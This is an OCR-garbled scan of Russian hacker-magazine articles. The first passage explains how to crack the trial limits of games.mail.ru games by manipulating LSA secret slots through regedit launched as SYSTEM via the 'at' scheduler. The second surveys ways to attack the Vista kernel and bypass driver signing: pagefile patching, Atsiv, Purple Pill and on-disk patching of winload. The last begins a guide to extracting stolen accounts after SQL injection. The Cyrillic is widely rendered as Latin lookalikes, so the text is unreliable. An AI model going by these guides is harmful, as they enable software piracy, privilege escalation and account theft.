текста, что утомительно, непродуктивно и опять-таки не уни- 
версально (а ведь наша цель — универсальный взлом!). 

К счастью, существует множество бесплатных І_5А-шпионов, 
например «Каин и Авель» (Саіп-п-АЬеІ. ѵѵѵѵѵѵ.охісі.іі/саіп. 
НітІ І. услугами которого мы и воспользуемся. Запускаем его 
на стерильной машине (то есть до установки любой из тех 
игр, что представлены на датез.таіі.ги), переходим в раз- 
дел І_5А Бесгеіз, нажимаем кнопку «+» на панели инструмен- 
тов и получаем дамп секретов в шестнадцатеричной форме. 



Затем устанавливаем Аде оі Зарап (или любую другую игруш- 
ку), повторяем сканирование вновь и... ага! В дампе появля- 
ется пара слотов вида 1_$0Тпп, 1_$0Тпп_, где пп — некоторое 
число, например, равное 22. Поиграем немного и повторим 
сканирование І_5Аеще один раз. Слоты І_$ОТпп, 1_$0Тпп_ из- 
менились, вто время какостальные остались без изменений. 
Таким образом, мы нашли, где защита прячет свои данные, 
и теперь остается придумать, какуговорить ее продолжить 
работу даже после истечения триала. 

^ ТЕХНИКА ВЗЛОМА 

Мы находимся на финальной стадии взлома, но от 
самого взлома нас отделяет выбор из множества путей. 
Можно, например, написать перехватчик, подменяю- 
щий вызовы І_5А-функций своими собственными проце- 
дурами, лишь имитирующими запись в Защищенное 
хранилище, но не осуществляющими ее физически. 

Зто довольно универсальный способ, работающий со 
множеством триальных программ (а не только с теми, 
что с датез.таіі.ги ). но ему присущи по меньшей мере 
два серьезных недостатка. Во-первых, это же сидеть и 
писать надо, то есть тратить время, шевелить мозгом 
и стучать по клавиатуре :). Во-вторых, некоторые про- 
граммы действительно нуждаются в І_5А и с подобным 
перехватчиком работать не будут, поэтому нам придется 
изобретать сложный эвристический механизм, позво- 



Опасненько 

Защитный метод, используемый еатез.таіі.ги, порочный и небезопасный. Объем Ь5А Роіісу ограничен 4096 слотами, 
и примерно половина из них уже занята и активно используется системой (здесь, в частности, хранятся пароли служб 
ѴѴіпбоѵѵз) . Причем при удалении программ с ^атез .таіі.ги используемая ими пара слотов остается в реестре (на тот 
случай, если вдруг пользователь решит переустановить программу, ранее установленную в системе) . Таким образом, мы 
можем устанавливать не больше 1024 программ с датез.таіі.ги (4096/2/2 = 1024) , а на практике и того меньше, после 
чего ѴѴіпсІоѵѵз войдет в штопор и произойдет общесистемный крах. 

Кому-то 1024 программы может показаться очень большой величиной, но это не так. Если система не переустанав- 
ливается годами, но каждый день устанавливается/удаляется новое программное обеспечение, то такими темпами 
отведенный лимит исчерпывается очень быстро. И что самое интересное, с ѴѴіпсІоѵѵз 2000 функции ЬзаЗіогеРгіѵаіеПаіа/ 
ЬзаКеИгіеѵеРгіѵаііеПаііа официально документированы, и существует множество утилит, отображающих содержимое Защи- 
щенного хранилища. 

Місгозой вообще не рекомендует использовать ЬЗА, а уж тем более такими варварскими методами без удаления слотов при 
деинсталляции приложения. 
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Статья Алека Дэви- 
са, рассказывающая 
о тайниках операци- 
онной системы, при- 
годных для хранения 
секретных данных: 
ѵѵ ѵѵѵѵ.тісгозой.сот/ 
гиз/тзсіп/тадагіпе/ 
агсЫѵе/2003-1 1/ 
1_оскіпдАссеззТо5ес 
геіРаІаРиІІ.азр . 
Официальное опи- 
сание АРІ -функции 
І-заБіогеРгіѵаіеРаіа, 
используемой 
многими защитными 
механизмами для 
хранения триальных 
данных и прочей 
секретной информа- 
ции, предназначен- 
ной «не для всех» 

(на английском 
язы ке): Ыір://тзсІп2. 
тісгозой.сот/еп- 
из/[іЬгагѵ/тз721818. 




> СІѴСІ 

На нашем диске ты 
найдешь популяр- 
ные утилиты для 
мониторинга І_5А, а 
также оригинал игры 
«Век Японии». 
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Лучшие игры сдатез.таіі.ги 

ляющий отличить «защитные данные» от честных криптографи- 
ческих ключей. І_5А интенсивно используется системой (особенно 
Зегѵег 2003), и потому автоматический перехват приводит к развалу 
ѴѴіпсІоѵѵз, в чем я уже успел убедиться. 

На самом деле для взлома ничего своего писать не нужно — впол- 
не хватит и штатных средств в виде редактора реестра. Воттолько 
заглянуть в нужную ветвь, даже с правами администратора, никак не 
получится. Нас просто туда не пустят! Ведь это все-таки Защищен- 
ное хранилище, а не проходной двор! Но ведь не писать же из-за 
этого целый драйвер? 

Разумеется, нет! Достаточно воспользоваться штатным планировщи- 
ком, запускающим приложения с привилегиями Зузіет, позволяя нам 
просматривать и модифицировать все ветви реестра без исключения (в 
том числе и защищенные). 

Запускаем гедесі И:32 (полноценный 32-битный редактор реестра), указав 
время, на минуту или две опережающее текущее, и терпеливо ждем. 

Если редактор на экране не появится, значит мы забыли задать ключ 
/іпіегасііѵе» или служба планировщика отключена. Зайди в раздел 
«Службы» и включи. 

ЗАПУСК РЕДАКТОРА РЕЕСТРА ЧЕРЕЗ ШТАТНЫЙ ПЛАНИРОВЩИК 
С ПРИВИЛЕГИЯМИ 5Ѵ5ТЕМ 

Ціше 

Текущее время: 19:61:59,69 # узнаем текущее время: 

Введите новое время : 

аС 19:63 /іпЦегасІііѵе гедес!іі:32 . ехе # устанавливаем 
запуск гедес1і1:32 на минуту вперед ХХХХХХХХХ 

Когда редактор реестра наконец-то запустится, открываем ветвь НКІ_М\ 
8ЕСШ?ІТѴ\РоІісу\5есге1:5 и смотрим, что у настам. Подветви вида І_$ОТпп 

Шпионаж за содержимым І_5А-слотов с помощью утилиты «Каин и Авель» 





При первом запуске Аде о! Зарап появляется противный ЫАб-Зсгееп, сооб- 
щающий, что игроку дается всего 60 минут 

и І_$ОТпп_ принадлежат играм аатез.гпаіі.ги . Если на компьютере уста- 
новлено несколько игр, то выяснить, какому приложению соответствует 
та или иная пара ветвей, можно при помощи «Каина и Авеля». 

Идея — экспортируем пару ветвей І_$ОТпп/І_$ОТпп_ в гед-файлы, а когда 
игровое время закончится, просто импортируем их оттуда (внимание: 
просто навести курсор на гед-файл и нажать на <епІег> явно недоста- 
точно — у нас просто не хватит прав, и потому необходимо запустить 
редактор реестра через команду аі. ехе и выполнить им порт уже в нем с 
привилегиями 8узІет). 

Действуя таким образом, мы можем продлевать игровое время бесконеч- 
ное количество раз (как вручную, так и по расписанию, благо планировщик 
под рукой, а редактор реестра еще не разучился понимать ключи команд- 
ной строки). Этоттрюкособенно полезен для игр типа «бродил ка», которые 
не позволяют сохранять состояние игрока, а бродить по ним можно часами, 
итакобидно, когда отпущенное время заканчивается на самом интересном 
месте, буквально в двух шагах от победы! Так что планировщик рулит! 

А как быть, если мы спохватились слишком поздно и отпущенное нам 
игровое время уже истекло? Экспорт и импорт в этом случае ничего 
не дадут, но! Если набраться смелости и удалить пару ветвей І_$ОТпп/ 
І_$ОТпп_, при следующем запуске игра сообщит, что она неправильно 
установлена и потребует переустановки, после которой... Правильно! Мы 
получим целый час законного игрового времени! 

^ ЗАКЛЮЧЕНИЕ 

Вот мы и поломали Аде оі Зарап, а вместе с ней и все остальные игры с 
аатез.гпаіі.ги . включая многочисленныетриальные защиты, скрыва- 
ющие данные в І_8А. При этом назвать эти действия «взломом» язык не 
поворачивается! Ведь код и данные игры остаются нетронутыми, ну а из 
своего собственного Защищенного хранилища мы вправе выкидывать 
всякий мусор, который туда записывается без нашего ведома, т 

КегЬегоз — один из лучших АРІ-шпионов, который мы будем использовать 
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ВТОРЖЕНИЕ 
В ЯДРО ВИСТЫ 



ВСЕ О ВНУТРЕННИХ АТАКАХ В МОДНОЙ 05 



Пресс-релизы, распространяемые империей зла, пугают нас чудовищными имениями 
в ядре Висты, направленными на борьбу с малварью. Кое-кто даже поговаривает, что 
вирусы скоро вымрут, как мамонты. Ну с вирусами ладно — покончить с ними нам обе- 
щают с завидной регулярностью, но все никак не покончат. Хуже всего то, что Виста на- 
кладывает серьезные ограничения на хакинг ядра, и на грани выживания оказываются 
совсем не вирусы, а хакеры и легальные разработчики проактивных защитных средств! 
На самом деле все эти слухи очень сильно преувеличены и внедриться в ядро вполне ре- 
ально. Более чем реально. 



ем отличается Виста отХР? Если отбросить интерфейс, раз- 
работанный для блондинок, мы получим ядро, доставшееся 
в наследство отѴѴіпсіоѵѵз 5егѵег2003 и претерпевшее ряд су- 
щественных изменений, вылившихся в принципиально новую 
драйверную модель (и потому драйвер, написанный сучетом особенностей 
Висты, подХР работать просто не будет). Но в контексте безопасности (о 



котором мы, собственно, и говорим) изменения 32-разрядной версии 
Висты настолько невелики, что на них не стоит даже и отвлекаться. Ну 
закрыли доступ к псевдоустройству \0еѵісе\РЬу5ІсаІМетогу с прикладного 
уровня — такэто еще в 5егѵег2003 5Р1 было сделано. Толку с того? \йеѵісе\ 
РЬузісаІМетогу редко использовался хакерами, и в основном пострадали 
легальные программисты. Заблокировали прямую секторную запись на 
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неразмонированныйтом. И, между прочим, правильно сде- 
лали. Кроме Рутковской, ее все равно никто не использовал. 
Но даже сейчас остается куча путей для обхода блокировки, 
которые М іеговой не закрыла и, судя по всему, закрывать не 
собирается, так что хакеры продолжают пребывать в нирване, 
собираясь совершить очередную серию атак. 

Другое дело — х86-64 версия Висты, ставящая всех разработ- 
чиков раком. Она снабжена нереально крутыми защитными 
механизмами —такими, что, почитав мануал, можно понять: 
крыша у МісгобоЙ сорвана и назад уже не воротится. 

Первое и главное — все драйверы в обязательном порядке 
должны быть снабжены цифровой подписью, и загрузить 
драйвер, даже обладая правами администратора, у нас не по- 
лучится! К32-битной версии Висты (и к 64-битной версии под 
Йапіит) это не относится, и мы по-прежнему можем загружать 
неподписанные драйверы функцией 2ѵѵІ_оасЮгіѵег или любым 
другим способом. 

Второе — х86-64 версия Висты препятствует модификации 
ядра, предотвращая сплайсинг (то есть перехват системных 
вызовов), подмену обработчиков втаблице прерываний ит.д. 
За это отвечает механизм РаІсбОиагсІ, который хакеры взло- 
мали еще до того, как Виста попала на прилавок. Атаки на ядро 
все еще продолжаются, а вотлегальные разработчики сильно 
страдают, поскольку без модификации ядра невозможно 
написать ни нормальный антивирус, ни брандмауэр, ни другой 
продукт подобного типа. 

Ксчастью, огромное количество драйверов, написанных 
под ѴѴ2К/ХР, модифицирует ядро в целях производственной 
необходимости, и по соображениям обратной совместимости 
х86-версия Висты (и 64-битная Виста под Йапіит) никакие 
препятствует модификации ядра, хоть МісгобоЙ и грозится, что 
скоро все будетнетак. Но это наврядли, поскольку операци- 
онная система, на которой не запускаются любимые (и ктому 
же легально купленные) приложения, идет в топку. 

Есть и другие, менее существенные изменения, но для нас они 
не представляют ровным счетом никакого интереса. Мы будем 
говорить главным образом об атаках на ядро х86-64 версии 
Висты, поскольку 32-битные версии атакуются по прежней 
схеме. 

г ОПЫТ — СЫН ОШИБОК ТРУДНЫХ 

Экспериментируя с бета-версией Висты, Жанна Рутковская 
предложила не слишком изящный, но все-таки пригодный 
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32-битная версия Висты не требует обязательной цифровой 
подписи для драйверов 



для «промышленных» атак метод обхода цифровой подписи 
драйверов, который вошел в состав знаменитой «Голубой 
пилюли» и был продемонстрирован ею на хакерских конфе- 
ренциях ЗуЗсап (Сингапур) и ВІаскНаІ (Лас-Вегас) жарким 
летом 2006 года. 

Полный текст презентации лежит на ШрУ/іпѵІБІЬІеіЫпоБ.ого/ 
рарег5/раппа%20гиікоѵѵ5ка%20-%205иЬѵегііпд%20ѵІ5іа%2 
ОкегпеІ.ррГ а в двух словах суть идеи можно обрисовать так: 
если «скушать» всю доступную память (например, при помощи 
функции ѴігЬиаІІАІІос), то ядро (в конфигурации поумолчанию!) 



Основные 
«хакерские» 
отличия Висты 
отХР 

х86-версия и 64-битная версия под Йапіит: 

• Заблокирован доступ к псевдоустройству \Оеѵісе\ 
РІіузісаІМетогу с прикладного уровня. Защита взломана 
хакером по кличке сгагуіогб. Но вообще это не слишком 
большая потеря для кодокопателей. 

• Заблокирован прямой доступ к неразмонированным 
томам, что обходится через документированный интерфейс 
5РТІ, недокументированные ЮСТЪ-коды 5С5ІОР_АТА_ 
РА55ТНКОШН и ЮСИ_ГОЕ_РА53_ТНКОШН, а также 
драйверами сторонних производителей: А5РІ, КаѵѵОізки др. 

х86-б4-версия: 

• Требование цифровой подписи для всех драйверов. Обхо- 
дится утилитой Агзіѵ от ЬіпсЬріп ЬаЬз. 

• Нет защиты от уязвимых драйверов. 

• Отсутствует механизм отзыва цифровой подписи для 
драйверов начального уровня. 

• Запрет на модификацию ядра, обеспечиваемый механиз- 
мом РаГсЬ-Сиагб. 




Официальный сайт 
Жанны Рутковской 
с кучей интерес- 
ных материалов и 
ворохом хакерских 
утилит: ЬЛр:// 
{ЬеіпѵІБІЫеіЫпдБ. 
огд. 

Анализ ядра Висты 
сточки зрения 
безопасности, 
выполненный 
сотрудниками 
исследовательского 
центра корпорации 
Эутапіес: 
ѵѵѵѵѵѵ.Бѵгпапіес. 
сот/аѵсепіег/ 
ге^егепсе/ѴѴіпсІоѵѵБ 
Ѵізіа Кегпеі Мосіе 
Бесигііѵ.рсІГ 
Утилита командной 
строки, позволя- 
ющая загружать 
неподписанные 
драйверы^ 
ѵѵѵѵѵѵ.ІіпсЬріпІаЬБ. 
сот/гезоигсев/а^БІу/ 
изаде-сІеБІдп.Ьіпп. 
Обзорная статья, 
посвященная 
проблемам поиска 
дырявых драйверов: 
ѵѵѵѵѵѵ.ріоІгЬапіа.сот 
/ а 11/а гбсіез/еѵѵбсі. 
рбГ 
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РаѵѵОізк — сторонний драйвер для Висты, обеспечивающий возможность 
прямойзаписи налюбой диск, включая системный 



начнет вытеснять драйверы на диск в файл подкачки. До этого файла можно 
дотянуться, открыв диск каклогическое устройство функцией СгеаІеЕіІе 
(требует прав администратора) и модифици- 
ровав выгруженные драйверы через ѴѴгіІеРіІе, 
внедрив в нихзЬеІІ-код, отключающий проверку 
цифровой подписи. Например, после этого 
вредоносный драйвер может быть загружен 
обычный путем, то есть через 2ѵѵІ_оасЮгіѵег. 

Поначалу МісговоЙ послала Жанну с ее «атакой» 
в/беѵ/пиі, поскольку с правами администратора 
еще не такое можно сделать. Однако Жанна 
продолжала упорствовать, раздавая интервью 
и советуя разработчикам ядра, что им, глупым, 
делать. Конкретно, она предлагала следующее: 

1) заблокировать посекторный доступ к диску из 
пользовательского режима; 

2) зашифровать файл подкачки или хотя бы 
проверять его целостность, как на ЫеШ80; 

3) запретить выгрузку ядерных компонентов на 
диск, пожертвовав ~80 Мб памяти. 

Кстати говоря, последний механизм уже реа- 
лизован в Висте, кажется, еще со времен ЫТ 
4.0, и переписывать ядро не нужно. Достаточно 
запустить редактор реестра, зайти в ветку НКІ_М\ 
8Ѵ8ТЕМ\СиггепЮопІго18еі\Соп1:гоІ.\8е55Іоп 
Мападег\МетогуМападетеп1;, найти там пара- 
метр ОізаЫеРадіпдЕхесибѵе (поумолчанию рав- 
ный нулю) и установить его в единицу. Вот и все! 

После перезагрузки мы получим невыгружаемое 
ядро. Кстати говоря, это полезно сделать уже хотя 
бы для того, чтобы избежать проблем с некоторы- 
ми бажными драйверами, разработчики которых 
забыли, что на уровне обработки прерываний 
диспетчер подкачки не работает. И если драйвер 
попытается вызвать код, выгруженный на диск, 
система рухнет в голубой экран. 

К большому удивлению окружающих, М іеговой пошла по первому пути, 
заблокировав прямую запись на неразмонтированный дисковый том 
(а системный том размонтировать нельзя, иначе как потом работать?). 
Это вызывало шквал негодования в лагере поклонников Рутковской, 
сочинивших кучу историй, например, о том, как писать утилиты для 



«Поначалу 
МісгозоН послала 
Жанну с ее «ата- 
кой» в /беѵ/пиі, 
поскольку с пра- 
вами администра- 
тора еще не такое 
можно сделать. 
Однако Жанна 
продолжала упорс- 
твовать, раздавая 
интервью и сове- 
туя разработчикам 
ядра, что им, глу- 
пым, делать» 



восстановления ошибочно удаленных файлов. На самом деле М іеговой 
приняла правильное решение, исправив древний баг, на который до сих 
пор просто как-то не обращали внимания. Прямая запись на неразмо- 
нированный том чревата полным разрушением последнего. Допустим, 
прикладная программа модифицирует запись МЕТ для восстановления 
ошибочно удаленного файла, а в это же самое время операционная 
система перемещает МЕТ в другое место или 
использует освободившуюся записьдля раз- 
мещения нового файла. В результате образу- 
ется хаос. 

Доказательством того, что МісговоЙ действитель- 
но исправила баг, а вовсе не кинулась в бой с Рут- 
ковской, служит тот фа кт, что открытие дискового 
устройства функцией СгеаЕеЕіІе происходит впол- 
неуспешно, а вот функция ѴѴгіІеЕіІе клеитласты 
независимо оттого, какой сектор она обновляет 
— принадлежащий или непринадлежащий файлу 
подкачки. Исключение составляют первые 8 Кб 
тома, которые соответствуют 16 секторам; в них 
запись по-прежнему разрешена. 
ЕІесистемныйтом размонтируется в два приема: 
вызывается СгеаІеЕіІе и передается полу- 
ченный обработчикфункции ОеѵісеІоСопІгоІ, 
запущенной с флагом Е8СТЕ_Е0СК_Ѵ0ЕІІМЕ 
или Е8СТЕДЗІ8МОиМТ_ѴОІ_1)МЕ. Однако если 
даже файл подкачки расположен на другом томе, 
размонтировать его все равно не удастся. Тупик? 
Вовсе нет. Существует множество других методов 
низкоуровневой работы с диском (как документи- 
рованных, так и нет). 

Прежде всего, это интерфейс 8РТІ (8С8І Равз- 
ТЬгоидЬ ІпІеНасе), присутствующий во всех 
ЫТ-подобных системах и позволяющий посылать 
дисковым устройствам 8081-команды, преоб- 
разуемые операционной системой в нативные 
команды этого устройства, в роли которого может 
выступать хоть флешка, воткнутая в У8В, хоть 
ЮЕ-винт. Достаточно изучить М80Ы — поиск 
по ІОСП-командам 8С8І_РА88_ТЕІР01)6ЕІ, 
І0СТЕ_8С8І_РА88_ТНР01І6ЕІ и І0СТЕ_8С8І_РА88_ТНР0ибН_0ІРЕСТ вы- 
даетмного интересного, втом числе и готовые демонстрационные примеры 
(включенные в йОК). 

Экспериментпоказывает, что низкоуровневая запись на системныйтом че- 
рез 8РТІ до сих пор не заблокирована (хоть и требует прав администратора). 
Еще существует большое количество недокументированных ІОСТЕ-кодов. 
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Новинка 



• Полный спектр мультимедиа 
возможностей -объемный 
звук / регулировка тембра 

• Передовая модель тюнера 
РИіІірз с функциями объемного 
звука и регулировки тембра 



реклама 



Что в имени твоем? 

В переводе с английского Ѵізіа — «перспектива», «перспективы, возможности, виды (на 
будущее)», что выглядит очень странно в свете решения МісгозоЛ похоронить эту перспективу 
через два года, заменив ее новой системой. Существует мнение, что Виста окажется чем-то 
вроде ѴѴіпсІоѵѵз Ме — плохо продуманной, сделанной на скорую руку системой, выброшенной 
на рынок лишь затем, чтобы заполнить образовавшийся вакуум хоть чем-нибудь. 
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Полный спектр мультимедиа 
возможностей - функция К05, 
объемный звук, регулировка 
тембра 

Передовая модель тюнера 
РИіІірз с функциями объемного 
звука и регулировки тембра 



АѴегТѴ Зіисііо 505/507 
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«Кушаем» память, чтобы вытеснить ядро на диск 



Например, следующие команды предназначены для прямой работы с ЮЕ-дисками: 5С5І0Р_АТА_ 
РА55ТНР01ЮН/ЮСТІ__ЮЕ_РА55_ТНР01ЮН, и они также не заблокированы (во всяком случае, 
пока). 

Кроме того, хочется вспомнить о А5РІ-драйвере от компании Асіаріес, через который работают 
многие программы, пишущие или копирующие Сй/ОѴО. Это очень глючный драйвер, и при опре- 
деленных обстоятельствах он дает прямой доступ не только к оптическим приводам, но и кжестким 
дискам, причем без прав администратора. Впрочем, совсем не факт, что он вообще заработает. 
Наконец, можно не париться, а воспользоваться нормальным драйвером РаѵѵОізк откомпа- 
нии ЕЬООЭ ( мѵѵѵѵ.еШоз.согп/гаѵѵсІівк ). позволяющим писать куда угодно в любой версии Висты. 
Естественно, если мы точим вирус, а не утилиту для восстановления ошибочно удаленных файлов, 
этот драйвер придется всюду таскать за собой и ктомуже платить за него деньги, поскольку он не 
бесплатен. 



г ПОДПИСЬ ДРАЙВЕРОВ 

Механизм подписи драйверов, реализованный компанией МісгозоЙ еще в \Л/іпсІоѵѵ5 2000, изна- 
чально не предназначался для защиты системы от вторжения и просто информировал админист- 
ратора о потенциальных проблемах, предотвращая установку драйверов, написанных мелкими 
фирмами, даже не позаботившимися о получении подписи. 

В х86-64 версиях Висты подпись драйверов стала обязательной. Ну и что стого? Механизм 
подписи драйверов есть, а вот процедуры отзыва подписи нет. Представим себе, что сотрудник 
некоторой компании (занимающейся разработкой драйверов) крадети выкладывает в открытый 
доступ секретный ключ, после чего драйверы может подписывать кто угодно и МісгозоЛ ничего не 
может сделать. 

Антивирусная пародия с гордым названием йе^епсіег (если только она не выключена пользова- 
телем за ненадобностью) получает из Сети свежие сигнатуры и потому потенциально способна 
пресечьзагрузку драйверов, подписанныхукраденной цифровой подписью. Однако это воздейс- 
твуеттолько на драйверы, загружаемые после ѴѴІЫЕОАО.ЕХЕ. А первичные драйверы, загружа- 



АѴегТѴ Зіисііо 509 
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емые на ранней стадии загрузки операционной системы, ни йе^епсіег, ни 
какой-либо другой механизм прищемить не в состоянии. Но что делать 
с легальными драйверами, подписаннымиукраденной подписью? Если 
они перестанут работать, система рухнет, что 
само по себе является нехилой распределен- 
ной атакой. Просто крадем секретный ключ 
крупной компании и выкладываем его в Сеть. 

Затем фирма получает другой секретный ключ, 
заново подписывает все ранее выпущенные 
драйверы, а пользователи их качают. 

Но это все ерунда. Дизассемблирование 
показывает, что проверка цифровой подписи 
осуществляется всего в двух местах — в файлах 
МТ05КНЫЕ.ЕХЕ и ѴѴІЫЮАО.ЕХЕ, которые 
можно хакнуть прямо на диске. Доступ к этим 
файлам заблокирован, но мы тоже нелыком 
шиты! Переименуем файл ЫТ05КРМІ_.ЕХЕ 
в МТ05КЕЫІ_.НСК (система это разреша- 
ет), тутже скопируем его в МТ05КНІ\ІІ_.ЕХЕ, 
который уже и отпатчим. То же самое сделаем 
и с ѴѴІЫШАО.ЕХЕ. Естественно, для этого 
придется предварительно уем и рить ѴѴіпсіоѵѵз 
Еезоигсе Ргоіесбоп (она же ѴѴПР), устанавли- 
вающую права доступа ксистемным файлам в 
Тгиз^есПпзІаІІег, что повыше администратора 
будет. Однако весь фокус в том, что, обладая 
правами администратора, можно заполучить 
и Тгизіесііпзіаиег. Подробнее отом, какэто 
сделать, рассказывается в отчете корпорации 
Зѵтапіес: ѵѵѵѵѵѵ.зѵтапіес.согп/аѵсепіег/ 
геіегепсе/ѴѴіпсІоѵѵз Ѵізіа Кегпеі Мосіе 
ЗесигіТ/.рсІЕ 

А теперь самое интересное! Лаборатория 
ЫпсЬріп І_аЬз (занимающаяся разработкой 
системных утилит для ѴѴіпсіоѵѵз) совершила 
первую реальную атаку на Висту, доказав 

полную практическую бесполезность процедуры цифровой подписи. 
Зарегистрировав «левую» фирму, она получила секретный ключ, которым 
подписала драйвер Аізіѵ, позволяющий загружать неподписанные драйве- 
ры. И не просто загружать, а еще и скрывать их присутствие в системе, что 
достигается путем исключения драйвера из списка РзІ-оасІесІМосІиІезІізІ. То 
есть Аізіѵ фактически представляет собой самый настоящий гооІікМ:, образу- 
ющий огромную дыру в безопасности. Сам-то он подписан, а вотзагружае- 
мые им драйверы — нет. 

«Пурпурная пилюля» в открытом доступе 

'*• гг.»ісУч*рк:Мі лміііИр ■ . іи» сет»! 4 
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Получение секретного ключа чисто формальная процедура, и «нотариаль- 
но»заверить драйвер не проблема. Лабораторию Ыпсбріп І_аЬз вообще 
сильноудивило, насколько просто делаются такие вещи. Но ведь иначе и 

быть не может! Драйверы создаются тысяча- 
ми фирм, и если каждую фирму подвергать 
строгой проверке на предмет ее появления и 
рода деятельности, то Виста сильно рискует 
остаться без свежих драйверов. Разработ- 
чики забьют на нее и пересядут на І_іпих. А 
без драйверов Виста никому не нужна. Даже 
даром. 

Реакция МісгозоЛ последовала незамедли- 
тельно, и в базе йеіюпсіег’а появилась новая 
сигнатура, блокирующая запуск АЫѵ'а (при 
условии, что пользователь держит йеіюпсіег 
включенным и своевременно обновляетбазу 
сигнатур), а сам Аізіѵ внезапно исчез с сайта 
разработчиков ( ѵѵѵѵѵѵ.ІіпсЬріпІаЬз.сот/ 
гезоигсез/аізіѵ/изаде-безідп.біт ). хотя до 
этого он распространялся бесплатно. То есть 
МісгозоЛ как бы разрулила ситуацию. 

«Как бы» — потому что остается без 
ответа вопрос, поставленный лаборато- 
рией Ыпсбріп І_аЬз: «Подписанный файл 
однозначно идентифицирует компанию, 
разработавшую его, но, когда компании 
создаются и регистрируются таким образом, 
что истинные основатели и директора 
фирмы остаются в тени, спрашивается: что 
же в действительности представляет собой 
цифровая подпись? Отсутствие реального 
контроля за поведением драйвера не обес- 
печивает никакой реальной безопасности, 
за исключением невозможности распро- 
странения анонимных драйверов». 

В общем, цифровая подпись представляет 
собой лишь видимость защиты, и с гооІкіЕами приходится бороться дедов- 
скими методами — путем антивирусной проверки с постоянно обновля- 
емой базой сигнатур. Если у нас нетантивируса, мы можем подцепить 
малварь, снабженную цифровой подписью, но, если антивирус есть, какой 
смысл в цифровой подписи? Правильно, никакого смысла в ней нет, только 
лишняя головная боль для легальных разработчиков. 

г «ПУРПУРНАЯ ПИЛЮЛЯ» И ДРУГИЕ ДРАГИ В АССОРТИМЕНТЕ 

Никакой программный продукт не застрахован отошибок, и потому драй- 
веры представляют собой весьма соблазнительный объект для хакерских 
атак, причемтакие атаки началисьзадолго до появления Висты и заморо- 
чекс цифровой подписью. 

Все очень просто — драйвер работает в режиме ядра и взаимодействует 
с прикладными программами через те или иные механизмы, зачастую 
даже не требуя прав администратора. Допустим, в драйвере есть ошибка 
типа переполнения буфера, позволяющая впрыснуть збеіі-код в ядерное 
пространство, повысить уровеньсвоих привилегий или выполнить руками 
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драйвера действие, которое (при нормальном развитии событий) недоступ- 
но с прикладного уровня. Учитывая, что многие драйверы создаются вовсе 
не для управления какими-то устройствами, а какраз для выполнения 
действий, необходимых разработчику, но недоступных с прикладного уров- 
ня (такие драйверы часто называются «псевдодрайверами»), угроза атаки 
становится вполне реальной. Теоретически разработчик псевдодрайвера 
должен предотвратить его «неавторизованное» использование посторон- 
ними программами, практически же нас окружает куча дырявых драйверов, 
часть из которых уже работает в Висте. 

В середине августа 2007 года Аіех Іопезси обнаружил ошибку в видеодрай- 
вере АМР АТІ АТЮ5МХХ.5У5, позволяющую локальному пользователю 
читать/писать ядерную память с прикладного уровня, впрыскивая зЬеІІ-код 
или отключая механизм проверки цифровой подписи. Для демонстрации 
атаки он написал «Пурпурную пилюлю» (Ригріе РіЩ и выложил ее в откры- 
тый доступ 7 августа, а через 78 часов по соображениям хакерской этики 
убрал, но 39 человекуже успели ее скачать. 

Дыра в уязвимом драйвере была оперативно исправлена, но какзаставить 
пользователей скачать обновления? МісгозоЙ, перебрав несколько вари- 
антов, решила ничего не предпринимать, поскольку уязвимые драйверы 
установлены на миллионах машин, и, если забанить их в Реіюпсіег’е, поль- 
зователи просто завопят и судьба Висты будет предрешена. Кому нужна 
система, которая в обязательном порядке требует установки обновлений, 
принудительно переводя монитор в позорный Ѵ6А-режим? 

Дыра в АМО/АТІ -драй вере первая, но уж точно не последняя, и «пи- 
люли» разных цветов будут появляться и дальше, поскольку намного 
проще и дешевле использовать брешь в чужом драйвере, чем регистри- 
ровать «левую» фирму для подписи своего собственного. Естественно, 
наибольший интерес представляют драйверы, входящие в штатный 
комплект поставки Висты и работающие с сетевым стеком, позволяя 



осуществлять не только локальные, но и удаленные атаки. 

Все, что нам нужно, — это отладчик и дизассемблер. Список наиболее 
«соблазнительных» драйверов с краткими пояснениями приведен ниже 
(примечание: для упрощения анализа рекомендуется загрузить отладоч- 
ные символы с серверов МісгозоЙ, которые распространяются бесплатно): 

ЫЕТІО.ЗУЗ — реализует сетевой стек ІРѵ4/ІРѵ6. 

НТТР.ЗУЗ — обрабатывает НТТР-запросы. 

МКХЗМВІО.ЗУЗ — отвечает за поддержку ЗМВ версии 1. 
МКХЗМВ20 .ЗУЗ — отвечает за поддержку ЗМВ версии 2 . 
МРХБАѴ.ЗУЗ — обрабатывает МеЪБАѴ. 

МЗКРС.зуз — реализует механизм удаленного вызова про- 
цедур М3 КРС . 

г ЗАКЛЮЧЕНИЕ 

Выпуская очередную операционную систему, МісгозоЙ обещает положить 
конец вирусам, червям и хакерам, но всякий раз исполнение обещанного 
переносится на неопределенный срок. Новоявленныезащитные механиз- 
мы (как правило, позаимствованные из мира I) N IX) взламываются задолго 
до того, как система успевает поступить на рынок. Противостояние меча и 
щита продолжается. 

Разумеется, мы рассмотрели лишь некоторые, наиболее интересные атаки 
на ядро Висты, оставив за кадром огромный пласт материала (включая ме- 
ханизм Раісб-биагсі, заслуживающий отдельной статьи). Однако какие бы 
пакеты обновлений ни выходили, хакеры прорвали стратегические рубежи 
обороны ядра и вышли на оперативный простор. Естественно, МісгозоЙ это 
дело так не оставит и будет нам всячески противостоять, так что читай жур- 
нал «Хакер», чтобы быть в курсе последних событий, которые мы обязуемся 
освещать, ізс 
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Разделка баз данных 



КАК ГРАМОТНО ПАРСИТЬ БД| 



О том, что нынче большая часть лакомой информации хранится в БД, не стоит и говорить. 
Многочисленные рйр/азр/азрх/еіс -движки то и дело мелькают перед глазами, притягивая 
к себе содержимым баз. Однако не все так просто. Несмотря на то что в последних статьях 
было немало информации на тему 8(Д_,-инъекций и особенностей проведений подобных 
атак под различными СУБД, не затронутым остался один из самых наболевших вопросов 
— парсинг баз данных. Те, кто сталкивался с подобной проблемой, поймут меня :). Ведь об- 
наружение и раскрутка бага — это зачастую лишь 50% успеха, нужно еще и грамотно отпра- 
сить добытую инфу. Посуди сам, гораздо приятнее, когда после двух бессонных ночей нара- 
ботанное «добро» мирно покоится на твоем винте в удобочитаемом виде, не так ли? Поэтому 
будь внимателен, сейчас я покажу тебе, как легко и непринужденно укрощается БД :). 



Н СЛИВАЕМ «ДОБРО» 

Представь себе та кую ситуацию: ты нашел инъект, раскрутил его, подобрал 
таблички/поля/колонки и уже собрался поживиться тысячей-другой чужих 
аккаунтов, как выясняется, что в ответ на твой запрос возвращается лишь одна 
